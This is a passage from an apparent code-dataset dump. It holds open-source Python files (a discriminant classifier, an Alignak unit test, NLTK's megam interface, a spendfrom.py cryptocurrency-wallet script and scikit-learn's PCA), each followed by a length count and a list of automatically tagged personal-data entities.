= [] + for i in range(len(self.classes)): + R = self.rotations[i] + S = self.scalings[i] + Xm = X - self.means_[i] + X2 = np.dot(Xm, R * (S ** (-0.5))) + norm2.append(np.sum(X2 ** 2, 1)) + norm2 = np.array(norm2).T # shape = [len(X), n_classes] + return (-0.5 * (norm2 + np.sum(np.log(self.scalings), 1)) + + np.log(self.priors_)) + + def predict(self, X): + """"""Perform classification on an array of test vectors X. + + The predicted class C for each sample in X is returned. + + Parameters + ---------- + X : array-like, shape = [n_samples, n_features] + + Returns + ------- + C : array, shape = [n_samples] + """""" + d = self.decision_function(X) + y_pred = self.classes[d.argmax(1)] + return y_pred + + def predict_proba(self, X): + """"""Return posterior probabilities of classification. + + Parameters + ---------- + X : array-like, shape = [n_samples, n_features] + Array of samples/test vectors. + + Returns + ------- + C : array, shape = [n_samples, n_classes] + Posterior probabilities of classification per class. + """""" + values = self.decision_function(X) + # compute the likelihood of the underlying gaussian models + # up to a multiplicative constant. + likelihood = np.exp(values - values.min(axis=1)[:, np.newaxis]) + # compute posterior probabilities + return likelihood / likelihood.sum(axis=1)[:, np.newaxis] + + def predict_log_proba(self, X): + """"""Return posterior probabilities of classification. + + Parameters + ---------- + X : array-like, shape = [n_samples, n_features] + Array of samples/test vectors. + + Returns + ------- + C : array, shape = [n_samples, n_classes] + Posterior log-probabilities of classification per class. + """""" + # XXX : can do better to avoid precision overflows + probas_ = self.predict_proba(X) + return np.log(probas_) +",7053,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Matthieu Perrot'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'np.asarray(y'], ['PERSON', ""%s'""], ['LOCATION', 'n_samples'], ['PERSON', 'means.append(meang'], ['LOCATION', 'Vt ='], ['NRP', 'V.T'], ['LOCATION', 'Vt'], ['LOCATION', 'rotations.append(Vt'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['NRP', 'gaussian'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['URL', 'email.com'], ['URL', 'np.ar'], ['URL', 'np.ar'], ['URL', 'clf.fi'], ['URL', 'clf.pr'], ['URL', 'self.pr'], ['URL', 'np.as'], ['URL', 'self.co'], ['URL', 'np.as'], ['URL', 'np.as'], ['URL', 'X.sh'], ['URL', 'y.sh'], ['URL', 'X.sh'], ['URL', 'y.sh'], ['URL', 'y.dtype.ch'], ['URL', 'ndimage.me'], ['URL', 'np.bi'], ['URL', 'y.as'], ['URL', 'np.int'], ['URL', 'X.sh'], ['URL', 'classes.si'], ['URL', 'self.pr'], ['URL', 'np.ar'], ['URL', 'ndimage.measurements.su'], ['URL', 'self.pr'], ['URL', 'self.pr'], ['URL', 'self.pr'], ['URL', 'Xg.me'], ['URL', 'np.linalg.sv'], ['URL', 'np.su'], ['URL', 'np.do'], ['URL', 'self.co'], ['URL', 'self.me'], ['URL', 'np.as'], ['URL', 'self.sc'], ['URL', 'np.as'], ['URL', 'self.ro'], ['URL', 'self.cl'], ['URL', 'np.as'], ['URL', 'self.cl'], ['URL', 'self.ro'], ['URL', 'self.sc'], ['URL', 'self.me'], ['URL', 'np.do'], ['URL', 'np.su'], ['URL', 'np.ar'], ['URL', 'np.su'], ['URL', 'self.sc'], ['URL', 'self.pr'], ['URL', 'self.de'], ['URL', 'self.cl'], ['URL', 'd.ar'], ['URL', 'self.de'], ['URL', 'np.ne'], ['URL', 'likelihood.su'], ['URL', 'np.ne'], ['URL', 'self.pr']]" +82,"#!/usr/bin/env python +# -*- coding: utf-8 -*- +# +# Copyright (C) 2015-2015: Alignak team, see AUTHORS.txt file for contributors +# +# This file is part of Alignak. +# +# Alignak is free software: you can redistribute it and/or modify +# it under the terms of the GNU Affero General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# Alignak is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Affero General Public License for more details. +# +# You should have received a copy of the GNU Affero General Public License +# along with Alignak. If not, see . +# +# +# This file incorporates work covered by the following copyright and +# permission notice: +# +# Copyright (C) 2009-2014: +# Jean Gabes, dummy@email.com +# Hartmut Goebel, dummy@email.com +# Grégory Starck, dummy@email.com +# Zoran Zaric, dummy@email.com +# Sebastien Coavoux, dummy@email.com + +# This file is part of Shinken. +# +# Shinken is free software: you can redistribute it and/or modify +# it under the terms of the GNU Affero General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# Shinken is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Affero General Public License for more details. +# +# You should have received a copy of the GNU Affero General Public License +# along with Shinken. If not, see . + +# +# This file is used to test reading and processing of config files +# + +from alignak_test import * + + +class TestConfig(AlignakTest): + def setUp(self): + self.setup_with_file('etc/alignak_resultmodulation.cfg') + + def get_svc(self): + return self.sched.services.find_srv_by_name_and_hostname(""test_host_0"", ""test_ok_0"") + + def get_host(self): + return self.sched.hosts.find_by_name(""test_host_0"") + + def get_router(self): + return self.sched.hosts.find_by_name(""test_router_0"") + + def test_service_resultmodulation(self): + svc = self.get_svc() + host = self.get_host() + router = self.get_router() + + self.scheduler_loop(2, [[host, 0, 'UP | value1=1 value2=2'], [svc, 2, 'BAD | value1=0 value2=0'],]) + self.assertEqual('UP', host.state) + self.assertEqual('HARD', host.state_type) + + # This service got a result modulation. So Criticals are in fact + # Warnings. So even with some CRITICAL (2), it must be warning + self.assertEqual('WARNING', svc.state) + + # If we remove the resultmodulations, we should have theclassic behavior + svc.resultmodulations = [] + self.scheduler_loop(2, [[host, 0, 'UP | value1=1 value2=2'], [svc, 2, 'BAD | value1=0 value2=0']]) + self.assertEqual('CRITICAL', svc.state) + + # Now look for the inheritaed thing + # resultmodulation is a inplicit inherited parameter + # and router define it, but not test_router_0/test_ok_0. So this service should also be impacted + svc2 = self.sched.services.find_srv_by_name_and_hostname(""test_router_0"", ""test_ok_0"") + self.assertEqual(router.resultmodulations, svc2.resultmodulations) + + self.scheduler_loop(2, [[svc2, 2, 'BAD | value1=0 value2=0']]) + self.assertEqual('WARNING', svc2.state) + + +if __name__ == '__main__': + unittest.main() +",3666,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2015-2015'], ['LOCATION', 'Alignak'], ['LOCATION', 'Alignak'], ['LOCATION', 'Alignak'], ['LOCATION', 'Alignak'], ['LOCATION', 'Alignak'], ['DATE_TIME', '2009-2014'], ['PERSON', 'Jean Gabes'], ['PERSON', 'Hartmut Goebel'], ['PERSON', 'Grégory Starck'], ['PERSON', 'Zoran Zaric'], ['PERSON', 'Sebastien Coavoux'], ['PERSON', 'Shinken'], ['PERSON', 'Shinken'], ['PERSON', 'Shinken'], ['PERSON', 'Shinken'], ['PERSON', 'test_service_resultmodulation(self'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'self.se'], ['URL', 'resultmodulation.cf'], ['URL', 'self.sched.services.fi'], ['URL', 'self.sched.hosts.fi'], ['URL', 'self.sched.hosts.fi'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.sc'], ['URL', 'self.as'], ['URL', 'host.st'], ['URL', 'self.as'], ['URL', 'host.st'], ['URL', 'self.as'], ['URL', 'svc.st'], ['URL', 'svc.re'], ['URL', 'self.sc'], ['URL', 'self.as'], ['URL', 'svc.st'], ['URL', 'self.sched.services.fi'], ['URL', 'self.as'], ['URL', 'router.re'], ['URL', 'svc2.re'], ['URL', 'self.sc'], ['URL', 'self.as'], ['URL', 'svc2.st'], ['URL', 'unittest.ma']]" +83,"# Natural Language Toolkit: Interface to Megam Classifier +# +# Copyright (C) 2001-2010 NLTK Project +# Author: Edward Loper dummy@email.com +# URL: +# For license information, see LICENSE.TXT +# +# $Id: naivebayes.py 2063 2004-07-17 21:02:24Z edloper $ + +"""""" +A set of functions used to interface with the external U{megam +} maxent optimization package. +Before C{megam} can be used, you should tell NLTK where it can find +the C{megam} binary, using the L{config_megam()} function. Typical +usage: + + >>> import nltk + >>> nltk.config_megam('.../path/to/megam') + >>> classifier = nltk.MaxentClassifier.train(corpus, 'megam') + +"""""" +__docformat__ = 'epytext en' + +import os +import os.path +import subprocess + +from nltk.internals import find_binary +try: + import numpy +except ImportError: + numpy = None + +###################################################################### +#{ Configuration +###################################################################### + +_megam_bin = None +def config_megam(bin=None): + """""" + Configure NLTK's interface to the C{megam} maxent optimization + package. + + @param bin: The full path to the C{megam} binary. If not specified, + then nltk will search the system for a C{megam} binary; and if + one is not found, it will raise a C{LookupError} exception. + @type bin: C{string} + """""" + global _megam_bin + _megam_bin = find_binary( + 'megam', bin, + env_vars=['MEGAM', 'MEGAMHOME'], + binary_names=['megam.opt', 'megam', 'megam_686', 'megam_i686.opt'], + url='http://www.cs.utah.edu/~hal/megam/') + +###################################################################### +#{ Megam Interface Functions +###################################################################### + +def write_megam_file(train_toks, encoding, stream, + bernoulli=True, explicit=True): + """""" + Generate an input file for C{megam} based on the given corpus of + classified tokens. + + @type train_toks: C{list} of C{tuples} of (C{dict}, C{str}) + @param train_toks: Training data, represented as a list of + pairs, the first member of which is a feature dictionary, + and the second of which is a classification label. + + @type encoding: L{MaxentFeatureEncodingI} + @param encoding: A feature encoding, used to convert featuresets + into feature vectors. + + @type stream: C{stream} + @param stream: The stream to which the megam input file should be + written. + + @param bernoulli: If true, then use the 'bernoulli' format. I.e., + all joint features have binary values, and are listed iff they + are true. Otherwise, list feature values explicitly. If + C{bernoulli=False}, then you must call C{megam} with the + C{-fvals} option. + + @param explicit: If true, then use the 'explicit' format. I.e., + list the features that would fire for any of the possible + labels, for each token. If C{explicit=True}, then you must + call C{megam} with the C{-explicit} option. + """""" + # Look up the set of labels. + labels = encoding.labels() + labelnum = dict([(label, i) for (i, label) in enumerate(labels)]) + + # Write the file, which contains one line per instance. + for featureset, label in train_toks: + # First, the instance number. + stream.write('%d' % labelnum[label]) + + # For implicit file formats, just list the features that fire + # for this instance's actual label. + if not explicit: + _write_megam_features(encoding.encode(featureset, label), + stream, bernoulli) + + # For explicit formats, list the features that would fire for + # any of the possible labels. + else: + for l in labels: + stream.write(' #') + _write_megam_features(encoding.encode(featureset, l), + stream, bernoulli) + + # End of the isntance. + stream.write('\n') + +def parse_megam_weights(s, features_count, explicit=True): + """""" + Given the stdout output generated by C{megam} when training a + model, return a C{numpy} array containing the corresponding weight + vector. This function does not currently handle bias features. + """""" + if numpy is None: + raise ValueError('This function requires that numpy be installed') + assert explicit, 'non-explicit not supported yet' + lines = s.strip().split('\n') + weights = numpy.zeros(features_count, 'd') + for line in lines: + if line.strip(): + fid, weight = line.split() + weights[int(fid)] = float(weight) + return weights + +def _write_megam_features(vector, stream, bernoulli): + if not vector: + raise ValueError('MEGAM classifier requires the use of an ' + 'always-on feature.') + for (fid, fval) in vector: + if bernoulli: + if fval == 1: + stream.write(' %s' % fid) + elif fval != 0: + raise ValueError('If bernoulli=True, then all' + 'features must be binary.') + else: + stream.write(' %s %s' % (fid, fval)) + +def call_megam(args): + """""" + Call the C{megam} binary with the given arguments. + """""" + if isinstance(args, basestring): + raise TypeError('args should be a list of strings') + if _megam_bin is None: + config_megam() + + # Call megam via a subprocess + cmd = [_megam_bin] + args + p = subprocess.Popen(cmd, stdout=subprocess.PIPE) + (stdout, stderr) = p.communicate() + + # Check the return code. + if p.returncode != 0: + print + print stderr + raise OSError('megam command failed!') + + return stdout + +",5800,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'http://www.nltk.org/'], ['DATE_TIME', '2001-2010'], ['PERSON', 'Edward Loper'], ['DATE_TIME', '2063 2004-07-17'], ['LOCATION', 'megam_bin'], ['PERSON', 'bin'], ['LOCATION', 'megam_bin'], ['PERSON', 'bin'], ['PERSON', 'megam_i686.opt'], ['PERSON', 'bernoulli=True'], ['LOCATION', 'C{tuples'], ['PERSON', 'bernoulli'], ['PERSON', 'labelnum'], ['PERSON', 'bernoulli'], ['PERSON', 'bernoulli'], ['PERSON', 'bernoulli'], ['LOCATION', 'fid'], ['LOCATION', 'fid'], ['LOCATION', 'megam_bin'], ['URL', 'http://www.cs.utah.edu/~hal/megam/'], ['URL', ""http://www.cs.utah.edu/~hal/megam/'""], ['URL', 'email.com'], ['URL', 'naivebayes.py'], ['URL', 'nltk.co'], ['URL', 'nltk.MaxentClassifier.tr'], ['URL', 'os.pa'], ['URL', 'nltk.int'], ['URL', 'encoding.la'], ['URL', 's.st'], ['URL', 'line.st'], ['URL', 'p.com'], ['URL', 'p.re']]" +84,"#!/usr/bin/env python +# +# Use the raw transactions API to spend ones received on particular addresses, +# and send any change back to that same address. +# +# Example usage: +# spendfrom.py # Lists available funds +# spendfrom.py --from=ADDRESS --to=ADDRESS --amount=11.00 +# +# Assumes it will talk to a oned or One-Qt running +# on localhost. +# +# Depends on jsonrpc +# + +from decimal import * +import getpass +import math +import os +import os.path +import platform +import sys +import time +from jsonrpc import ServiceProxy, json + +BASE_FEE=Decimal(""0.001"") + +def check_json_precision(): + """"""Make sure json library being used does not lose precision converting BTC values"""""" + n = Decimal(""20000000.00000003"") + satoshis = int(json.loads(json.dumps(float(n)))*1.0e8) + if satoshis != 2000000000000003: + raise RuntimeError(""JSON encode/decode loses precision"") + +def determine_db_dir(): + """"""Return the default location of the One Core data directory"""""" + if platform.system() == ""Darwin"": + return os.path.expanduser(""~/Library/Application Support/OneCore/"") + elif platform.system() == ""Windows"": + return os.path.join(os.environ['APPDATA'], ""OneCore"") + return os.path.expanduser(""~/.onecore"") + +def read_bitcoin_config(dbdir): + """"""Read the one.conf file from dbdir, returns dictionary of settings"""""" + from ConfigParser import SafeConfigParser + + class FakeSecHead(object): + def __init__(self, fp): + self.fp = fp + self.sechead = '[all]\n' + def readline(self): + if self.sechead: + try: return self.sechead + finally: self.sechead = None + else: + s = self.fp.readline() + if s.find('#') != -1: + s = s[0:s.find('#')].strip() +""\n"" + return s + + config_parser = SafeConfigParser() + config_parser.readfp(FakeSecHead(open(os.path.join(dbdir, ""one.conf"")))) + return dict(config_parser.items(""all"")) + +def connect_JSON(config): + """"""Connect to a One Core JSON-RPC server"""""" + testnet = config.get('testnet', '0') + testnet = (int(testnet) > 0) # 0/1 in config file, convert to True/False + if not 'rpcport' in config: + config['rpcport'] = 19998 if testnet else 9876 + connect = ""http://%s:dummy@email.com:%s""%(config['rpcuser'], config['rpcpassword'], config['rpcport']) + try: + result = ServiceProxy(connect) + # ServiceProxy is lazy-connect, so send an RPC command mostly to catch connection errors, + # but also make sure the oned we're talking to is/isn't testnet: + if result.getmininginfo()['testnet'] != testnet: + sys.stderr.write(""RPC server at ""+connect+"" testnet setting mismatch\n"") + sys.exit(1) + return result + except: + sys.stderr.write(""Error connecting to RPC server at ""+connect+""\n"") + sys.exit(1) + +def unlock_wallet(oned): + info = oned.getinfo() + if 'unlocked_until' not in info: + return True # wallet is not encrypted + t = int(info['unlocked_until']) + if t <= time.time(): + try: + passphrase = getpass.getpass(""Wallet is locked; enter passphrase: "") + oned.walletpassphrase(passphrase, 5) + except: + sys.stderr.write(""Wrong passphrase\n"") + + info = oned.getinfo() + return int(info['unlocked_until']) > time.time() + +def list_available(oned): + address_summary = dict() + + address_to_account = dict() + for info in oned.listreceivedbyaddress(0): + address_to_account[info[""address""]] = info[""account""] + + unspent = oned.listunspent(0) + for output in unspent: + # listunspent doesn't give addresses, so: + rawtx = oned.getrawtransaction(output['txid'], 1) + vout = rawtx[""vout""][output['vout']] + pk = vout[""scriptPubKey""] + + # This code only deals with ordinary pay-to-one-address + # or pay-to-script-hash outputs right now; anything exotic is ignored. + if pk[""type""] != ""pubkeyhash"" and pk[""type""] != ""scripthash"": + continue + + address = pk[""addresses""][0] + if address in address_summary: + address_summary[address][""total""] += vout[""value""] + address_summary[address][""outputs""].append(output) + else: + address_summary[address] = { + ""total"" : vout[""value""], + ""outputs"" : [output], + ""account"" : address_to_account.get(address, """") + } + + return address_summary + +def select_coins(needed, inputs): + # Feel free to improve this, this is good enough for my simple needs: + outputs = [] + have = Decimal(""0.0"") + n = 0 + while have < needed and n < len(inputs): + outputs.append({ ""txid"":inputs[n][""txid""], ""vout"":inputs[n][""vout""]}) + have += inputs[n][""amount""] + n += 1 + return (outputs, have-needed) + +def create_tx(oned, fromaddresses, toaddress, amount, fee): + all_coins = list_available(oned) + + total_available = Decimal(""0.0"") + needed = amount+fee + potential_inputs = [] + for addr in fromaddresses: + if addr not in all_coins: + continue + potential_inputs.extend(all_coins[addr][""outputs""]) + total_available += all_coins[addr][""total""] + + if total_available < needed: + sys.stderr.write(""Error, only %f BTC available, need %f\n""%(total_available, needed)); + sys.exit(1) + + # + # Note: + # Python's json/jsonrpc modules have inconsistent support for Decimal numbers. + # Instead of wrestling with getting json.dumps() (used by jsonrpc) to encode + # Decimals, I'm casting amounts to float before sending them to oned. + # + outputs = { toaddress : float(amount) } + (inputs, change_amount) = select_coins(needed, potential_inputs) + if change_amount > BASE_FEE: # don't bother with zero or tiny change + change_address = fromaddresses[-1] + if change_address in outputs: + outputs[change_address] += float(change_amount) + else: + outputs[change_address] = float(change_amount) + + rawtx = oned.createrawtransaction(inputs, outputs) + signed_rawtx = oned.signrawtransaction(rawtx) + if not signed_rawtx[""complete""]: + sys.stderr.write(""signrawtransaction failed\n"") + sys.exit(1) + txdata = signed_rawtx[""hex""] + + return txdata + +def compute_amount_in(oned, txinfo): + result = Decimal(""0.0"") + for vin in txinfo['vin']: + in_info = oned.getrawtransaction(vin['txid'], 1) + vout = in_info['vout'][vin['vout']] + result = result + vout['value'] + return result + +def compute_amount_out(txinfo): + result = Decimal(""0.0"") + for vout in txinfo['vout']: + result = result + vout['value'] + return result + +def sanity_test_fee(oned, txdata_hex, max_fee): + class FeeError(RuntimeError): + pass + try: + txinfo = oned.decoderawtransaction(txdata_hex) + total_in = compute_amount_in(oned, txinfo) + total_out = compute_amount_out(txinfo) + if total_in-total_out > max_fee: + raise FeeError(""Rejecting transaction, unreasonable fee of ""+str(total_in-total_out)) + + tx_size = len(txdata_hex)/2 + kb = tx_size/1000 # integer division rounds down + if kb > 1 and fee < BASE_FEE: + raise FeeError(""Rejecting no-fee transaction, larger than 1000 bytes"") + if total_in < 0.01 and fee < BASE_FEE: + raise FeeError(""Rejecting no-fee, tiny-amount transaction"") + # Exercise for the reader: compute transaction priority, and + # warn if this is a very-low-priority transaction + + except FeeError as err: + sys.stderr.write((str(err)+""\n"")) + sys.exit(1) + +def main(): + import optparse + + parser = optparse.OptionParser(usage=""%prog [options]"") + parser.add_option(""--from"", dest=""fromaddresses"", default=None, + help=""addresses to get ones from"") + parser.add_option(""--to"", dest=""to"", default=None, + help=""address to get send ones to"") + parser.add_option(""--amount"", dest=""amount"", default=None, + help=""amount to send"") + parser.add_option(""--fee"", dest=""fee"", default=""0.0"", + help=""fee to include"") + parser.add_option(""--datadir"", dest=""datadir"", default=determine_db_dir(), + help=""location of one.conf file with RPC username/password (default: %default)"") + parser.add_option(""--testnet"", dest=""testnet"", default=False, action=""store_true"", + help=""Use the test network"") + parser.add_option(""--dry_run"", dest=""dry_run"", default=False, action=""store_true"", + help=""Don't broadcast the transaction, just create and print the transaction data"") + + (options, args) = parser.parse_args() + + check_json_precision() + config = read_bitcoin_config(options.datadir) + if options.testnet: config['testnet'] = True + oned = connect_JSON(config) + + if options.amount is None: + address_summary = list_available(oned) + for address,info in address_summary.iteritems(): + n_transactions = len(info['outputs']) + if n_transactions > 1: + print(""%s %.8f %s (%d transactions)""%(address, info['total'], info['account'], n_transactions)) + else: + print(""%s %.8f %s""%(address, info['total'], info['account'])) + else: + fee = Decimal(options.fee) + amount = Decimal(options.amount) + while unlock_wallet(oned) == False: + pass # Keep asking for passphrase until they get it right + txdata = create_tx(oned, options.fromaddresses.split("",""), options.to, amount, fee) + sanity_test_fee(oned, txdata, amount*Decimal(""0.01"")) + if options.dry_run: + print(txdata) + else: + txid = oned.sendrawtransaction(txdata) + print(txid) + +if __name__ == '__main__': + main() +",9912,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['NRP', 'spendfrom.py'], ['NRP', 'spendfrom.py'], ['LOCATION', 'jsonrpc'], ['LOCATION', 'json'], ['PERSON', 'json'], ['PERSON', 'platform.system'], ['PERSON', 'Darwin'], ['PERSON', 'config_parser = SafeConfigParser'], ['NRP', 'address_to_account'], ['LOCATION', 'fromaddresses'], ['PERSON', 'fromaddresses'], ['NRP', 'float(amount'], ['PERSON', 'FeeError(""Rejecting'], ['PERSON', 'FeeError(""Rejecting'], ['PERSON', 'FeeError(""Rejecting'], ['PERSON', 'one.conf'], ['PERSON', 'txdata = create_tx(oned'], ['PERSON', 'options.fromaddresses.split'], ['URL', 'spendfrom.py'], ['URL', 'spendfrom.py'], ['URL', 'os.pa'], ['URL', 'platform.sy'], ['URL', 'os.pa'], ['URL', 'platform.sy'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'one.co'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.fp.re'], ['URL', 's.fi'], ['URL', 's.fi'], ['URL', 'parser.re'], ['URL', 'os.path.jo'], ['URL', 'one.co'], ['URL', 'parser.it'], ['URL', 'config.ge'], ['URL', 'email.com'], ['URL', 'result.ge'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'oned.ge'], ['URL', 'getpass.ge'], ['URL', 'sys.st'], ['URL', 'oned.ge'], ['URL', 'oned.li'], ['URL', 'oned.li'], ['URL', 'oned.ge'], ['URL', 'account.ge'], ['URL', 'sys.st'], ['URL', 'oned.cr'], ['URL', 'oned.si'], ['URL', 'sys.st'], ['URL', 'oned.ge'], ['URL', 'oned.de'], ['URL', 'sys.st'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'one.co'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.pa'], ['URL', 'options.am'], ['URL', 'summary.it'], ['URL', 'options.am'], ['URL', 'options.fr'], ['URL', 'options.to'], ['URL', 'oned.se']]" +85,""""""" Principal Component Analysis +"""""" + +# Author: Alexandre Gramfort dummy@email.com +# Olivier Grisel dummy@email.com +# Mathieu Blondel dummy@email.com +# Denis A. Engemann dummy@email.com +# +# License: BSD 3 clause + +from math import log, sqrt +import warnings + +import numpy as np +from scipy import linalg +from scipy.special import gammaln + +from ..base import BaseEstimator, TransformerMixin +from ..utils import array2d, check_random_state, as_float_array +from ..utils import atleast2d_or_csr +from ..utils.extmath import fast_logdet, safe_sparse_dot, randomized_svd, \ + fast_dot + + +def _assess_dimension_(spectrum, rank, n_samples, n_features): + """"""Compute the likelihood of a rank ``rank`` dataset + + The dataset is assumed to be embedded in gaussian noise of shape(n, + dimf) having spectrum ``spectrum``. + + Parameters + ---------- + spectrum: array of shape (n) + data spectrum + rank: int, + tested rank value + n_samples: int, + number of samples + dim: int, + embedding/empirical dimension + + Returns + ------- + ll: float, + The log-likelihood + + Notes + ----- + This implements the method of `Thomas P. Minka: + Automatic Choice of Dimensionality for PCA. NIPS 2000: 598-604` + """""" + if rank > len(spectrum): + raise ValueError(""The tested rank cannot exceed the rank of the"" + "" dataset"") + + pu = -rank * log(2.) + for i in range(rank): + pu += (gammaln((n_features - i) / 2.) + - log(np.pi) * (n_features - i) / 2.) + + pl = np.sum(np.log(spectrum[:rank])) + pl = -pl * n_samples / 2. + + if rank == n_features: + pv = 0 + v = 1 + else: + v = np.sum(spectrum[rank:]) / (n_features - rank) + pv = -np.log(v) * n_samples * (n_features - rank) / 2. + + m = n_features * rank - rank * (rank + 1.) / 2. + pp = log(2. * np.pi) * (m + rank + 1.) / 2. + + pa = 0. + spectrum_ = spectrum.copy() + spectrum_[rank:n_features] = v + for i in range(rank): + for j in range(i + 1, len(spectrum)): + pa += log((spectrum[i] - spectrum[j]) * + (1. / spectrum_[j] - 1. / spectrum_[i])) + log(n_samples) + + ll = pu + pl + pv + pp - pa / 2. - rank * log(n_samples) / 2. + + return ll + + +def _infer_dimension_(spectrum, n_samples, n_features): + """"""Infers the dimension of a dataset of shape (n_samples, n_features) + + The dataset is described by its spectrum `spectrum`. + """""" + n_spectrum = len(spectrum) + ll = np.empty(n_spectrum) + for rank in range(n_spectrum): + ll[rank] = _assess_dimension_(spectrum, rank, n_samples, n_features) + return ll.argmax() + + +class PCA(BaseEstimator, TransformerMixin): + """"""Principal component analysis (PCA) + + Linear dimensionality reduction using Singular Value Decomposition of the + data and keeping only the most significant singular vectors to project the + data to a lower dimensional space. + + This implementation uses the scipy.linalg implementation of the singular + value decomposition. It only works for dense arrays and is not scalable to + large dimensional data. + + The time complexity of this implementation is ``O(n ** 3)`` assuming + n ~ n_samples ~ n_features. + + Parameters + ---------- + n_components : int, None or string + Number of components to keep. + if n_components is not set all components are kept:: + + n_components == min(n_samples, n_features) + + if n_components == 'mle', Minka\'s MLE is used to guess the dimension + if ``0 < n_components < 1``, select the number of components such that + the amount of variance that needs to be explained is greater than the + percentage specified by n_components + + copy : bool + If False, data passed to fit are overwritten and running + fit(X).transform(X) will not yield the expected results, + use fit_transform(X) instead. + + whiten : bool, optional + When True (False by default) the `components_` vectors are divided + by n_samples times singular values to ensure uncorrelated outputs + with unit component-wise variances. + + Whitening will remove some information from the transformed signal + (the relative variance scales of the components) but can sometime + improve the predictive accuracy of the downstream estimators by + making there data respect some hard-wired assumptions. + + Attributes + ---------- + `components_` : array, [n_components, n_features] + Components with maximum variance. + + `explained_variance_ratio_` : array, [n_components] + Percentage of variance explained by each of the selected components. \ + k is not set then all components are stored and the sum of explained \ + variances is equal to 1.0 + + `n_components_` : int + The estimated number of components. Relevant when n_components is set + to 'mle' or a number between 0 and 1 to select using explained + variance. + + Notes + ----- + For n_components='mle', this class uses the method of `Thomas P. Minka: + Automatic Choice of Dimensionality for PCA. NIPS 2000: 598-604` + + Due to implementation subtleties of the Singular Value Decomposition (SVD), + which is used in this implementation, running fit twice on the same matrix + can lead to principal components with signs flipped (change in direction). + For this reason, it is important to always use the same estimator object to + transform data in a consistent fashion. + + Examples + -------- + + >>> import numpy as np + >>> from sklearn.decomposition import PCA + >>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]]) + >>> pca = PCA(n_components=2) + >>> pca.fit(X) + PCA(copy=True, n_components=2, whiten=False) + >>> print(pca.explained_variance_ratio_) # doctest: +ELLIPSIS + [ 0.99244... 0.00755...] + + See also + -------- + ProbabilisticPCA + RandomizedPCA + KernelPCA + SparsePCA + TruncatedSVD + """""" + def __init__(self, n_components=None, copy=True, whiten=False): + self.n_components = n_components + self.copy = copy + self.whiten = whiten + + def fit(self, X, y=None): + """"""Fit the model with X. + + Parameters + ---------- + X: array-like, shape (n_samples, n_features) + Training data, where n_samples in the number of samples + and n_features is the number of features. + + Returns + ------- + self : object + Returns the instance itself. + """""" + self._fit(X) + return self + + def fit_transform(self, X, y=None): + """"""Fit the model with X and apply the dimensionality reduction on X. + + Parameters + ---------- + X : array-like, shape (n_samples, n_features) + Training data, where n_samples is the number of samples + and n_features is the number of features. + + Returns + ------- + X_new : array-like, shape (n_samples, n_components) + + """""" + U, S, V = self._fit(X) + U = U[:, :self.n_components_] + + if self.whiten: + # X_new = X * V / S * sqrt(n_samples) = U * sqrt(n_samples) + U *= sqrt(X.shape[0]) + else: + # X_new = X * V = U * S * V^T * V = U * S + U *= S[:self.n_components_] + + return U + + def _fit(self, X): + """""" Fit the model on X + Parameters + ---------- + X: array-like, shape (n_samples, n_features) + Training vector, where n_samples in the number of samples and + n_features is the number of features. + + Returns + ------- + U, s, V : ndarrays + The SVD of the input data, copied and centered when + requested. + """""" + X = array2d(X) + n_samples, n_features = X.shape + X = as_float_array(X, copy=self.copy) + # Center data + self.mean_ = np.mean(X, axis=0) + X -= self.mean_ + U, S, V = linalg.svd(X, full_matrices=False) + self.explained_variance_ = (S ** 2) / n_samples + self.explained_variance_ratio_ = (self.explained_variance_ / + self.explained_variance_.sum()) + + if self.whiten: + self.components_ = V / S[:, np.newaxis] * sqrt(n_samples) + else: + self.components_ = V + + n_components = self.n_components + if n_components is None: + n_components = n_features + elif n_components == 'mle': + if n_samples < n_features: + raise ValueError(""n_components='mle' is only supported "" + ""if n_samples >= n_features"") + n_components = _infer_dimension_(self.explained_variance_, + n_samples, n_features) + + if 0 < n_components < 1.0: + # number of components for which the cumulated explained variance + # percentage is superior to the desired threshold + ratio_cumsum = self.explained_variance_ratio_.cumsum() + n_components = np.sum(ratio_cumsum < n_components) + 1 + + self.components_ = self.components_[:n_components, :] + self.explained_variance_ = \ + self.explained_variance_[:n_components] + self.explained_variance_ratio_ = \ + self.explained_variance_ratio_[:n_components] + + self.n_components_ = n_components + return (U, S, V) + + def transform(self, X): + """"""Apply the dimensionality reduction on X. + + Parameters + ---------- + X : array-like, shape (n_samples, n_features) + New data, where n_samples is the number of samples + and n_features is the number of features. + + 